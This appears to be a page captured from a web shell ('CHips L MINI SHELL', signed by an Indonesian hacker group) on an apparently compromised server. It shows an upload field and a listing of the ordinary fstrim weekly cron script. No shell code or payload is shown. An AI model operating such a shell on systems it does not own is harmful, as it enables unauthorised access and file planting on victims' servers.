CHips L MINI SHELL

CHips L pro

Current Path : /etc/cron.weekly/
Upload File :
Current File : //etc/cron.weekly/fstrim

#!/bin/sh
# Prevent fstrim to run inside a container environment (LP: #1589289)
if /usr/bin/systemd-detect-virt -q -c; then
exit 0
fi
# trim all mounted file systems which support it
/sbin/fstrim --all || true

Copyright 2K16 - 2K18 Indonesian Hacker Rulez